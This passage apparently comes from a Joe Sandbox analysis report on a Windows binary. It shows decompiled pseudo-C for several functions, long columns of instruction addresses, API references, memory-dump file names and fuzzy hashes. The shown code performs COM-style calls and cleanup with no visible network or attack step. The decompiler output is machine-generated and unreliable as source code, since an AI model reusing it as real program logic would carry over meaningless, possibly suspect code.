						 *[fs:0x0] =  *((intOrPtr*)(_t348 - 0xc));
						return _t195;
					}
				}
				_t195 = 0x80004004;
				goto L62;
			}































                              0x00402812
                              0x0040281f
                              0x00402830
                              0x0040283c
                              0x0040283f
                              0x00402841
                              0x00402843
                              0x00402848
                              0x0040284b
                              0x0040284b
                              0x0040284e
                              0x00402852
                              0x00402856
                              0x00402859
                              0x0040285f
                              0x00402869
                              0x0040286c
                              0x0040286e
                              0x00402879
                              0x0040287c
                              0x0040287f
                              0x00402882
                              0x00402887
                              0x0040288b
                              0x0040288f
                              0x0040289f
                              0x004028a4
                              0x004028cd
                              0x004028d2
                              0x004028d9
                              0x004028de
                              0x004028e1
                              0x00402cc1
                              0x00402cc3
                              0x00402cc6
                              0x00402ccb
                              0x00402cd3
                              0x00402cd8
                              0x00402cd8
                              0x00000000
                              0x00402cd8
                              0x004028e7
                              0x004028eb
                              0x004028ef
                              0x004028fc
                              0x00402900
                              0x00402903
                              0x00402905
                              0x0040290e
                              0x00402912
                              0x00402919
                              0x0040291e
                              0x0040292a
                              0x0040292d
                              0x0040292d
                              0x00402930
                              0x0040293d
                              0x00402940
                              0x00402942
                              0x00000000
                              0x00000000
                              0x00402944
                              0x00402948
                              0x0040294b
                              0x0040294f
                              0x00402956
                              0x00402959
                              0x00402966
                              0x0040296d
                              0x0040296f
                              0x00402971
                              0x004029a7
                              0x004029ac
                              0x004029ae
                              0x004029b2
                              0x004029b2
                              0x004029b2
                              0x004029b2
                              0x004029b9
                              0x004029bd
                              0x004029c2
                              0x004029d1
                              0x004029d4
                              0x004029d6
                              0x00000000
                              0x004029dc
                              0x004029dc
                              0x004029e0
                              0x004029e2
                              0x00402a00
                              0x00402a03
                              0x00402a06
                              0x00402a08
                              0x00402a0b
                              0x00402a0b
                              0x00402a11
                              0x00402a16
                              0x00402a1b
                              0x00402a24
                              0x00402a28
                              0x00402a2d
                              0x00402a30
                              0x00402a45
                              0x00402a4a
                              0x00402a4d
                              0x00402a51
                              0x00402a56
                              0x00402a56
                              0x00402a5b
                              0x00402a5e
                              0x00402a60
                              0x00402a63
                              0x00402a6a
                              0x00402a6b
                              0x00402a6b
                              0x00402a63
                              0x00402a73
                              0x00402a76
                              0x00402a7a
                              0x00402a7f
                              0x00402a82
                              0x00402a86
                              0x00402ad0
                              0x00402ad5
                              0x00402ade
                              0x00402ae2
                              0x00402ae7
                              0x00402ae9
                              0x00402b72
                              0x00402b72
                              0x00402b75
                              0x00402c6b
                              0x00402c72
                              0x00402c7d
                              0x00402c85
                              0x00402c8d
                              0x00402c95
                              0x00402c9b
                              0x00402c9f
                              0x00402ca7
                              0x00402cab
                              0x00402cb3
                              0x00402cb7
                              0x00000000
                              0x00402cb7
                              0x00402b7b
                              0x00402b7d
                              0x00402b82
                              0x00402b85
                              0x00402b98
                              0x00402b98
                              0x00402b87
                              0x00402b87
                              0x00402b8a
                              0x00402b8e
                              0x00402b94
                              0x00402b94
                              0x00402b9a
                              0x00402b9c
                              0x00402b9f
                              0x00402ba2
                              0x00402ba7
                              0x00402ba7
                              0x00402bad
                              0x00402bb3
                              0x00402bb9
                              0x00402bbd
                              0x00402bc0
                              0x00402bc5
                              0x00402bc7
                              0x00402c58
                              0x00402c60
                              0x00402c64
                              0x00402c66
                              0x00000000
                              0x00402bcd
                              0x00402bd9
                              0x00402bde
                              0x00402be0
                              0x00402be4
                              0x00402be9
                              0x00402be9
                              0x00402bf2
                              0x00402bfa
                              0x00402c02
                              0x00402c0a
                              0x00402c14
                              0x00402c18
                              0x00402c20
                              0x00402c24
                              0x00402c2c
                              0x00402c30
                              0x00402c38
                              0x00402c3d
                              0x00402c45
                              0x00402c4a
                              0x00000000
                              0x00402c4a
                              0x00402bc7
                              0x00402af2
                              0x00402af7
                              0x00402af9
                              0x00000000
                              0x00000000
                              0x00402b07
                              0x00402b12
                              0x00402b1a
                              0x00402b22
                              0x00402b2a
                              0x00402b2d
                              0x00402b31
                              0x00402b31
                              0x00000000
                              0x00402a88
                              0x00402a88
                              0x00402a91
                              0x00402a96
                              0x00402a99
                              0x00402a9b
                              0x00402aa7
                              0x00402aaa
                              0x00402a9d
                              0x00402a9d
                              0x00402a9d
                              0x00402ab2
                              0x00402aba
                              0x00402ac0
                              0x00402ac4
                              0x00402b36
                              0x00402b39
                              0x00402b41
                              0x00402b45
                              0x00402b4a
                              0x00402b4d
                              0x00402b51
                              0x00402b59
                              0x00402b5e
                              0x00402b66
                              0x00402b6b
                              0x00000000
                              0x00402b6b
                              0x00402a86
                              0x00402a32
                              0x00402a35
                              0x00000000
                              0x00402a35
                              0x004029e4
                              0x004029e7
                              0x00000000
                              0x00000000
                              0x004029f0
                              0x004029f3
                              0x004029f6
                              0x004029f8
                              0x00000000
                              0x004029f8
                              0x004029d6
                              0x00402976
                              0x0040297a
                              0x00402982
                              0x00402986
                              0x0040298e
                              0x00402993
                              0x0040299b
                              0x004029a0
                              0x00000000
                              0x004029a0
                              0x00402920
                              0x00402920
                              0x00000000
                              0x00402920
                              0x00402914
                              0x00000000
                              0x00402914
                              0x00402907
                              0x00402907
                              0x00000000
                              0x00402907
                              0x004028a9
                              0x004028af
                              0x00000000
                              0x004028af
                              0x00402898
                              0x00000000
                              0x00402870
                              0x00402870
                              0x004028b4
                              0x004028b4
                              0x004028bb
                              0x004028c0
                              0x00402cda
                              0x00402ce0
                              0x00402ce8
                              0x00402ce8
                              0x0040286e
                              0x00402832
                              0x00000000

                              APIs
                              • __EH_prolog.LIBCMT ref: 00402812
                                • Part of subcall function 00402D80: EnterCriticalSection.KERNEL32(?,?,?,004095B9), ref: 00402D85
                                • Part of subcall function 00402D80: LeaveCriticalSection.KERNEL32(?,?,?,?,004095B9), ref: 00402D8F
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: CriticalSection$EnterH_prologLeave
                              • String ID:
                              • API String ID: 367238759-0
                              • Opcode ID: 71e1dc36bd9d06b7d898947adcd583decfbfe7f4f6cc64154346a2ad7b3dab8a
                              • Instruction ID: 6b86c84e82b28a82bfdc9d9b9477fa58d6923614df4f06b31c284573bb568367
                              • Opcode Fuzzy Hash: 71e1dc36bd9d06b7d898947adcd583decfbfe7f4f6cc64154346a2ad7b3dab8a
                              • Instruction Fuzzy Hash: 14F1AD30900249DFCF14EFA5C989ADEBBB4AF54318F14806EE445B72E2DB789A45CF19
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00408A3B Relevance: 1.9, APIs: 1, Instructions: 374COMMON
                              Download Yara Rule
                              C-Code - Quality: 87%
                              			E00408A3B(intOrPtr __ecx) {
				intOrPtr _t181;
				signed int _t184;
				signed int* _t187;
				intOrPtr _t188;
				signed int* _t191;
				signed int* _t193;
				void* _t194;
				signed int* _t195;
				void* _t197;
				signed int* _t198;
				void* _t200;
				signed int* _t201;
				intOrPtr _t205;
				signed int* _t207;
				signed int* _t208;
				signed int* _t209;
				intOrPtr* _t213;
				intOrPtr* _t215;
				intOrPtr _t216;
				intOrPtr* _t217;
				intOrPtr* _t220;
				signed int* _t222;
				signed int* _t223;
				signed int* _t224;
				intOrPtr* _t232;
				signed int* _t234;
				signed int* _t235;
				signed int* _t236;
				intOrPtr* _t243;
				signed int* _t245;
				signed int* _t246;
				signed int* _t247;
				intOrPtr _t255;
				signed int _t266;
				signed int _t307;
				signed int _t313;
				intOrPtr _t317;
				signed int** _t319;
				intOrPtr _t320;
				void* _t322;

				E00413954(E00419B47, _t322);
				_push(_t313);
				 *((intOrPtr*)(_t322 - 0x20)) = __ecx;
				E00408A27(__ecx);
				if( *((intOrPtr*)( *((intOrPtr*)(_t322 + 0xc)) + 8)) < 0x20) {
					while(1) {
						_t317 =  *((intOrPtr*)(_t322 + 0xc));
						_t307 = 1;
						_t313 = _t313 | 0xffffffff;
						_t181 =  *((intOrPtr*)(_t317 + 8));
						 *(_t322 - 0x24) = _t313;
						if(_t181 < _t307) {
							goto L6;
						}
						L4:
						_t266 =  *( *((intOrPtr*)(_t322 - 0x20)) + 8);
						if(_t266 >= _t181) {
							L76:
							 *((char*)( *((intOrPtr*)(_t322 - 0x20)) + 0x30)) = _t266 & 0xffffff00 |  *( *((intOrPtr*)(_t322 - 0x20)) + 8) != 0x00000000;
							_t184 = 0;
							goto L77;
						}
						 *(_t322 - 0x24) =  *( *((intOrPtr*)(_t317 + 0xc)) + (_t181 - _t266) * 4 - 4);
						L7:
						if(_t266 != 0) {
							 *(_t322 - 0x38) = 0;
							 *((short*)(_t322 - 0x36)) = 0;
							_t319 =  *( *((intOrPtr*)( *((intOrPtr*)(_t322 - 0x20)) + 0xc)) + _t266 * 4 - 4);
							_t187 =  *_t319;
							 *(_t322 - 4) = _t307;
							_t188 =  *((intOrPtr*)( *_t187 + 0x20))(_t187, _t307, _t322 - 0x38);
							if(_t188 != 0) {
								L35:
								 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
								_t320 = _t188;
								E00405E34(_t322 - 0x38);
								L71:
								_t184 = _t320;
								goto L77;
							}
							if( *(_t322 - 0x38) != 0x13) {
								L75:
								 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
								_t266 = _t322 - 0x38;
								E00405E34(_t266);
								goto L76;
							}
							_t191 =  *_t319;
							_t313 =  *(_t322 - 0x30);
							_t188 =  *((intOrPtr*)( *_t191 + 0x14))(_t191, _t322 - 0x3c);
							if(_t188 != 0) {
								goto L35;
							}
							if(_t313 >=  *((intOrPtr*)(_t322 - 0x3c))) {
								goto L75;
							}
							 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
							E00405E34(_t322 - 0x38);
							 *(_t322 - 0x10) = 0;
							_t193 =  *_t319;
							_t266 =  *_t193;
							 *(_t322 - 4) = 2;
							_t194 =  *_t266(_t193, 0x41b228, _t322 - 0x10);
							_t195 =  *(_t322 - 0x10);
							if(_t194 != 0 || _t195 == 0) {
								 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
								goto L52;
							} else {
								 *(_t322 - 0x14) = 0;
								_t266 =  *_t195;
								 *(_t322 - 4) = 3;
								_t197 =  *((intOrPtr*)(_t266 + 0xc))(_t195, _t313, _t322 - 0x14);
								_t198 =  *(_t322 - 0x14);
								if(_t197 != 0 || _t198 == 0) {
									 *(_t322 - 4) = 2;
									goto L49;
								} else {
									 *(_t322 - 0x18) = 0;
									_t266 =  *_t198;
									 *(_t322 - 4) = 4;
									_t200 =  *_t266(_t198, 0x41b2f8, _t322 - 0x18);
									_t201 =  *(_t322 - 0x18);
									if(_t200 != 0 || _t201 == 0) {
										 *(_t322 - 4) = 3;
										goto L46;
									} else {
										E00408EA0(_t322 - 0x78);
										_push(_t322 - 0x74);
										_push(_t313);
										 *(_t322 - 4) = 5;
										_t205 = E0040836D(_t319);
										 *((intOrPtr*)(_t322 - 0x28)) = _t205;
										if(_t205 != 0) {
											 *(_t322 - 4) = 4;
											E004038C2(_t322 - 0x78);
											_t207 =  *(_t322 - 0x18);
											 *(_t322 - 4) = 3;
											if(_t207 != 0) {
												 *((intOrPtr*)( *_t207 + 8))(_t207);
											}
											_t208 =  *(_t322 - 0x14);
											 *(_t322 - 4) = 2;
											if(_t208 != 0) {
												 *((intOrPtr*)( *_t208 + 8))(_t208);
											}
											_t209 =  *(_t322 - 0x10);
											 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
											if(_t209 != 0) {
												 *((intOrPtr*)( *_t209 + 8))(_t209);
											}
											_t184 =  *((intOrPtr*)(_t322 - 0x28));
											goto L77;
										}
										 *((intOrPtr*)(_t322 - 0x1c)) = 0;
										_t213 =  *((intOrPtr*)(_t322 + 0x1c));
										 *(_t322 - 4) = 6;
										 *((intOrPtr*)( *_t213))(_t213, 0x41b218, _t322 - 0x1c);
										_t215 =  *((intOrPtr*)(_t322 - 0x1c));
										if(_t215 != 0) {
											 *((intOrPtr*)( *_t215 + 0xc))(_t215,  *((intOrPtr*)(_t322 - 0x74)));
										}
										 *(_t322 - 0x58) = _t313;
										_t216 = E00408524(_t322 - 0x78,  *((intOrPtr*)(_t322 + 8)),  *(_t322 - 0x24),  *(_t322 - 0x18), 0,  *((intOrPtr*)(_t322 + 0x1c)));
										 *((intOrPtr*)(_t322 - 0x28)) = _t216;
										if(_t216 == 1) {
											_t217 =  *((intOrPtr*)(_t322 - 0x1c));
											 *(_t322 - 4) = 5;
											if(_t217 != 0) {
												 *((intOrPtr*)( *_t217 + 8))(_t217);
											}
											_t266 = _t322 - 0x78;
											 *(_t322 - 4) = 4;
											E004038C2(_t266);
											_t201 =  *(_t322 - 0x18);
											 *(_t322 - 4) = 3;
											L46:
											if(_t201 != 0) {
												_t266 =  *_t201;
												 *((intOrPtr*)(_t266 + 8))(_t201);
											}
											_t198 =  *(_t322 - 0x14);
											 *(_t322 - 4) = 2;
											L49:
											if(_t198 != 0) {
												_t266 =  *_t198;
												 *((intOrPtr*)(_t266 + 8))(_t198);
											}
											 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
											_t195 =  *(_t322 - 0x10);
											L52:
											if(_t195 != 0) {
												_t266 =  *_t195;
												 *((intOrPtr*)(_t266 + 8))(_t195);
											}
											goto L76;
										} else {
											if(_t216 != 0) {
												_t220 =  *((intOrPtr*)(_t322 - 0x1c));
												 *(_t322 - 4) = 5;
												if(_t220 != 0) {
													 *((intOrPtr*)( *_t220 + 8))(_t220);
												}
												 *(_t322 - 4) = 4;
												E004038C2(_t322 - 0x78);
												_t222 =  *(_t322 - 0x18);
												 *(_t322 - 4) = 3;
												if(_t222 != 0) {
													 *((intOrPtr*)( *_t222 + 8))(_t222);
												}
												_t223 =  *(_t322 - 0x14);
												 *(_t322 - 4) = 2;
												if(_t223 != 0) {
													 *((intOrPtr*)( *_t223 + 8))(_t223);
												}
												_t224 =  *(_t322 - 0x10);
												 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
												if(_t224 != 0) {
													 *((intOrPtr*)( *_t224 + 8))(_t224);
												}
												_t184 =  *((intOrPtr*)(_t322 - 0x28));
												goto L77;
											}
											_push(_t322 - 0x4c);
											_push(_t322 - 0x54);
											_push(_t313);
											_t320 = E0040848C(_t319);
											if(_t320 != 0) {
												_t232 =  *((intOrPtr*)(_t322 - 0x1c));
												 *(_t322 - 4) = 5;
												if(_t232 != 0) {
													 *((intOrPtr*)( *_t232 + 8))(_t232);
												}
												 *(_t322 - 4) = 4;
												E004038C2(_t322 - 0x78);
												_t234 =  *(_t322 - 0x18);
												 *(_t322 - 4) = 3;
												if(_t234 != 0) {
													 *((intOrPtr*)( *_t234 + 8))(_t234);
												}
												_t235 =  *(_t322 - 0x14);
												 *(_t322 - 4) = 2;
												if(_t235 != 0) {
													 *((intOrPtr*)( *_t235 + 8))(_t235);
												}
												_t236 =  *(_t322 - 0x10);
												 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
												if(_t236 != 0) {
													 *((intOrPtr*)( *_t236 + 8))(_t236);
												}
												goto L71;
											}
											_push(_t322 - 0x78);
											E004093F0( *((intOrPtr*)(_t322 - 0x20)));
											_t243 =  *((intOrPtr*)(_t322 - 0x1c));
											 *(_t322 - 4) = 5;
											if(_t243 != 0) {
												 *((intOrPtr*)( *_t243 + 8))(_t243);
											}
											 *(_t322 - 4) = 4;
											E004038C2(_t322 - 0x78);
											_t245 =  *(_t322 - 0x18);
											 *(_t322 - 4) = 3;
											if(_t245 != 0) {
												 *((intOrPtr*)( *_t245 + 8))(_t245);
											}
											_t246 =  *(_t322 - 0x14);
											 *(_t322 - 4) = 2;
											if(_t246 != 0) {
												 *((intOrPtr*)( *_t246 + 8))(_t246);
											}
											_t247 =  *(_t322 - 0x10);
											 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
											if(_t247 != 0) {
												 *((intOrPtr*)( *_t247 + 8))(_t247);
											}
											while(1) {
												_t317 =  *((intOrPtr*)(_t322 + 0xc));
												_t307 = 1;
												_t313 = _t313 | 0xffffffff;
												_t181 =  *((intOrPtr*)(_t317 + 8));
												 *(_t322 - 0x24) = _t313;
												if(_t181 < _t307) {
													goto L6;
												}
												goto L4;
											}
										}
									}
								}
							}
						}
						E00408EA0(_t322 - 0xb4);
						 *(_t322 - 4) = 0;
						E00401D7A(_t322 - 0xb0,  *((intOrPtr*)(_t322 + 0x18)));
						 *(_t322 - 0x94) = _t313;
						_t255 = E00408902(_t322 - 0xb4,  *((intOrPtr*)(_t322 + 8)),  *(_t322 - 0x24),  *((intOrPtr*)(_t322 + 0x10)),  *((intOrPtr*)(_t322 + 0x14)),  *((intOrPtr*)(_t322 + 0x1c))); // executed
						_t320 = _t255;
						if(_t320 != 0) {
							 *(_t322 - 4) = _t313;
							E004038C2(_t322 - 0xb4);
							goto L71;
						}
						_push(_t322 - 0xb4);
						E004093F0( *((intOrPtr*)(_t322 - 0x20)));
						 *(_t322 - 4) = _t313;
						E004038C2(_t322 - 0xb4);
						continue;
						L6:
						_t266 =  *( *((intOrPtr*)(_t322 - 0x20)) + 8);
						if(_t266 >= 0x20) {
							goto L76;
						}
						goto L7;
					}
				} else {
					_t184 = 0x80004001;
					L77:
					 *[fs:0x0] =  *((intOrPtr*)(_t322 - 0xc));
					return _t184;
				}
			}











































                              0x00408a40
                              0x00408a4d
                              0x00408a4e
                              0x00408a51
                              0x00408a5f
                              0x00408a6d
                              0x00408a6d
                              0x00408a72
                              0x00408a73
                              0x00408a76
                              0x00408a79
                              0x00408a7e
                              0x00000000
                              0x00000000
                              0x00408a80
                              0x00408a83
                              0x00408a88
                              0x00408e81
                              0x00408e8a
                              0x00408e8d
                              0x00000000
                              0x00408e8d
                              0x00408a97
                              0x00408aab
                              0x00408aad
                              0x00408b1a
                              0x00408b1e
                              0x00408b25
                              0x00408b29
                              0x00408b33
                              0x00408b36
                              0x00408b3b
                              0x00408cfb
                              0x00408cfb
                              0x00408d02
                              0x00408d04
                              0x00408e56
                              0x00408e56
                              0x00000000
                              0x00408e56
                              0x00408b46
                              0x00408e75
                              0x00408e75
                              0x00408e79
                              0x00408e7c
                              0x00000000
                              0x00408e7c
                              0x00408b4c
                              0x00408b4e
                              0x00408b58
                              0x00408b5d
                              0x00000000
                              0x00000000
                              0x00408b66
                              0x00000000
                              0x00000000
                              0x00408b6c
                              0x00408b73
                              0x00408b78
                              0x00408b7b
                              0x00408b86
                              0x00408b89
                              0x00408b90
                              0x00408b94
                              0x00408b97
                              0x00408e6c
                              0x00000000
                              0x00408ba5
                              0x00408ba5
                              0x00408ba8
                              0x00408bb0
                              0x00408bb4
                              0x00408bb9
                              0x00408bbc
                              0x00408e63
                              0x00000000
                              0x00408bca
                              0x00408bca
                              0x00408bcd
                              0x00408bd9
                              0x00408bdd
                              0x00408be1
                              0x00408be4
                              0x00408e5a
                              0x00000000
                              0x00408bf2
                              0x00408bf5
                              0x00408bff
                              0x00408c00
                              0x00408c01
                              0x00408c05
                              0x00408c0c
                              0x00408c0f
                              0x00408d11
                              0x00408d15
                              0x00408d1a
                              0x00408d1d
                              0x00408d23
                              0x00408d28
                              0x00408d28
                              0x00408d2b
                              0x00408d2e
                              0x00408d34
                              0x00408d39
                              0x00408d39
                              0x00408d3c
                              0x00408d3f
                              0x00408d45
                              0x00408d4a
                              0x00408d4a
                              0x00408d4d
                              0x00000000
                              0x00408d4d
                              0x00408c15
                              0x00408c18
                              0x00408c27
                              0x00408c2b
                              0x00408c2d
                              0x00408c32
                              0x00408c3a
                              0x00408c3a
                              0x00408c43
                              0x00408c50
                              0x00408c58
                              0x00408c5b
                              0x00408d55
                              0x00408d58
                              0x00408d5e
                              0x00408d63
                              0x00408d63
                              0x00408d66
                              0x00408d69
                              0x00408d6d
                              0x00408d72
                              0x00408d75
                              0x00408d79
                              0x00408d7b
                              0x00408d7d
                              0x00408d80
                              0x00408d80
                              0x00408d83
                              0x00408d86
                              0x00408d8a
                              0x00408d8c
                              0x00408d8e
                              0x00408d91
                              0x00408d91
                              0x00408d94
                              0x00408d98
                              0x00408d9b
                              0x00408d9d
                              0x00408da3
                              0x00408da6
                              0x00408da6
                              0x00000000
                              0x00408c61
                              0x00408c63
                              0x00408dae
                              0x00408db1
                              0x00408db7
                              0x00408dbc
                              0x00408dbc
                              0x00408dc2
                              0x00408dc6
                              0x00408dcb
                              0x00408dce
                              0x00408dd4
                              0x00408dd9
                              0x00408dd9
                              0x00408ddc
                              0x00408ddf
                              0x00408de5
                              0x00408dea
                              0x00408dea
                              0x00408ded
                              0x00408df0
                              0x00408df6
                              0x00408dfb
                              0x00408dfb
                              0x00408dfe
                              0x00000000
                              0x00408dfe
                              0x00408c6e
                              0x00408c72
                              0x00408c73
                              0x00408c79
                              0x00408c7d
                              0x00408e06
                              0x00408e09
                              0x00408e0f
                              0x00408e14
                              0x00408e14
                              0x00408e1a
                              0x00408e1e
                              0x00408e23
                              0x00408e26
                              0x00408e2c
                              0x00408e31
                              0x00408e31
                              0x00408e34
                              0x00408e37
                              0x00408e3d
                              0x00408e42
                              0x00408e42
                              0x00408e45
                              0x00408e48
                              0x00408e4e
                              0x00408e53
                              0x00408e53
                              0x00000000
                              0x00408e4e
                              0x00408c89
                              0x00408c8a
                              0x00408c8f
                              0x00408c92
                              0x00408c98
                              0x00408c9d
                              0x00408c9d
                              0x00408ca3
                              0x00408ca7
                              0x00408cac
                              0x00408caf
                              0x00408cb5
                              0x00408cba
                              0x00408cba
                              0x00408cbd
                              0x00408cc0
                              0x00408cc6
                              0x00408ccb
                              0x00408ccb
                              0x00408cce
                              0x00408cd1
                              0x00408cd7
                              0x00408ce0
                              0x00408ce0
                              0x00408a6d
                              0x00408a6d
                              0x00408a72
                              0x00408a73
                              0x00408a76
                              0x00408a79
                              0x00408a7e
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00408a7e
                              0x00408a6d
                              0x00408c5b
                              0x00408be4
                              0x00408bbc
                              0x00408b97
                              0x00408ab5
                              0x00408ac3
                              0x00408ac6
                              0x00408ad4
                              0x00408ae6
                              0x00408aeb
                              0x00408aef
                              0x00408cee
                              0x00408cf1
                              0x00000000
                              0x00408cf1
                              0x00408afe
                              0x00408aff
                              0x00408b0a
                              0x00408b0d
                              0x00000000
                              0x00408a9c
                              0x00408a9f
                              0x00408aa5
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00408aa5
                              0x00408a61
                              0x00408a61
                              0x00408e8f
                              0x00408e95
                              0x00408e9d
                              0x00408e9d

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 463f0c4feddd306d7c1a8d70083033d754a2b3fae2b1194d3c8a033132b27601
                              • Instruction ID: 34c7193a5b50bb33ce0ba2a09d23f7b106f418ab12413814a78bbf0ce5505d58
                              • Opcode Fuzzy Hash: 463f0c4feddd306d7c1a8d70083033d754a2b3fae2b1194d3c8a033132b27601
                              • Instruction Fuzzy Hash: 62E17F70A00249DFCF10DFA4C988AAEBBB4AF58314F2445AEE495F72D1CB389E45CB55
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040EA0B Relevance: 1.8, APIs: 1, Instructions: 255COMMON
                              Download Yara Rule
                              C-Code - Quality: 91%
                              			E0040EA0B(intOrPtr* __ecx, signed int __edx, void* __eflags) {
				intOrPtr _t191;
				intOrPtr* _t197;
				intOrPtr _t202;
				void* _t220;
				void* _t227;
				intOrPtr _t267;
				signed int _t271;
				intOrPtr* _t273;
				intOrPtr* _t277;
				intOrPtr* _t279;
				intOrPtr* _t283;
				void* _t284;
				void* _t289;

				_t289 = __eflags;
				_t271 = __edx;
				E00413954(E0041A72D, _t284);
				_t273 = __ecx;
				E004032A8(_t284 - 0x5c, 8);
				 *((intOrPtr*)(_t284 - 0x5c)) = 0x41b694;
				 *(_t284 - 4) =  *(_t284 - 4) & 0x00000000;
				E004032A8(_t284 - 0xd8, 1);
				 *((intOrPtr*)(_t284 - 0xd8)) = 0x41b748;
				E004032A8(_t284 - 0xc4, 4);
				 *((intOrPtr*)(_t284 - 0xc4)) = 0x41b684;
				 *(_t284 - 4) = 2;
				E00402155(_t284 - 0x30);
				 *((intOrPtr*)(_t284 - 0x30)) = 0x41b7f8;
				E004032A8(_t284 - 0x84, 4);
				 *((intOrPtr*)(_t284 - 0x84)) = 0x41b684;
				E004032A8(_t284 - 0x9c, 8);
				 *((intOrPtr*)(_t284 - 0x9c)) = 0x41b694;
				E004032A8(_t284 - 0xb0, 1);
				 *((intOrPtr*)(_t284 - 0xb0)) = 0x41b748;
				E004032A8(_t284 - 0x70, 4);
				 *((intOrPtr*)(_t284 - 0x70)) = 0x41b684;
				_t277 =  *((intOrPtr*)(_t284 + 0x10));
				 *(_t284 - 4) = 7;
				E0040E86B(__ecx, __edx, 0, _t277, _t284 - 0x5c, _t284 - 0xd8, _t284 - 0xc4, _t284 - 0x30, _t284 - 0x84, _t284 - 0x9c, _t284 - 0xb0, _t284 - 0x70);
				 *(_t284 - 0x14) =  *(_t284 - 0x14) & 0x00000000;
				E0040AC6A(_t284 - 0x164, _t289, 1);
				_t227 =  *_t277 +  *((intOrPtr*)(_t284 + 8));
				asm("adc esi, [ebp+0xc]");
				 *(_t284 + 0xc) =  *(_t284 + 0xc) & 0x00000000;
				 *((intOrPtr*)(_t284 - 0x34)) =  *((intOrPtr*)(_t277 + 4));
				if( *((intOrPtr*)(_t284 - 0x28)) <= 0) {
					L17:
					 *(_t284 - 4) = 7;
					E0040C380(_t284 - 0x164, _t301); // executed
					 *(_t284 - 4) = 6;
					E004042AD(_t284 - 0x70);
					 *(_t284 - 4) = 5;
					E004042AD(_t284 - 0xb0);
					 *(_t284 - 4) = 4;
					E004042AD(_t284 - 0x9c);
					 *(_t284 - 4) = 3;
					E004042AD(_t284 - 0x84);
					 *((intOrPtr*)(_t284 - 0x30)) = 0x41b7f8;
					 *(_t284 - 4) = 0xc;
					_t279 = 0;
					L18:
					E004042D6();
					 *(_t284 - 4) = 2;
					E004042AD(_t284 - 0x30);
					 *(_t284 - 4) = 1;
					E004042AD(_t284 - 0xc4);
					 *(_t284 - 4) =  *(_t284 - 4) & 0x00000000;
					E004042AD(_t284 - 0xd8);
					 *(_t284 - 4) =  *(_t284 - 4) | 0xffffffff;
					E004042AD(_t284 - 0x5c);
					 *[fs:0x0] =  *((intOrPtr*)(_t284 - 0xc));
					return _t279;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					 *(_t284 - 0x40) =  *(_t284 - 0x40) & 0x00000000;
					 *(_t284 - 0x3c) =  *(_t284 - 0x3c) & 0x00000000;
					 *((intOrPtr*)(_t284 + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(_t284 - 0x24)) +  *(_t284 + 0xc) * 4));
					 *((intOrPtr*)(_t284 - 0x44)) = 0x41b818;
					_push(_t284 - 0x44);
					 *(_t284 - 4) = 9;
					E0040FA43( *((intOrPtr*)(_t284 + 0x14)));
					 *(_t284 - 4) = 8;
					 *((intOrPtr*)(_t284 - 0x44)) = 0x41b818;
					E00403A9C( *(_t284 - 0x3c));
					_t191 =  *((intOrPtr*)(_t284 + 0x14));
					_t282 =  *( *((intOrPtr*)(_t191 + 0xc)) +  *(_t191 + 8) * 4 - 4);
					 *(_t284 - 0x10) =  *( *((intOrPtr*)(_t191 + 0xc)) +  *(_t191 + 8) * 4 - 4);
					 *(_t284 - 0x1c) = E0040C281( *((intOrPtr*)(_t284 + 0x10)));
					_t256 =  *(_t284 - 0x1c);
					if( *(_t284 - 0x1c) !=  *(_t284 - 0x1c) || 0 != _t271) {
						E0040DB47(_t256);
					}
					E004076D5(_t282,  *(_t284 - 0x1c));
					_push(0x14);
					_t197 = E00403A76();
					_t283 = 0;
					if(_t197 != 0) {
						 *((intOrPtr*)(_t197 + 4)) = 0;
						 *_t197 = 0x41b824;
						_t283 = _t197;
					}
					_t294 = _t283;
					 *((intOrPtr*)(_t284 - 0x88)) = _t283;
					if(_t283 != 0) {
						 *((intOrPtr*)( *_t283 + 4))(_t283);
					}
					_t271 =  *(_t284 - 0x14);
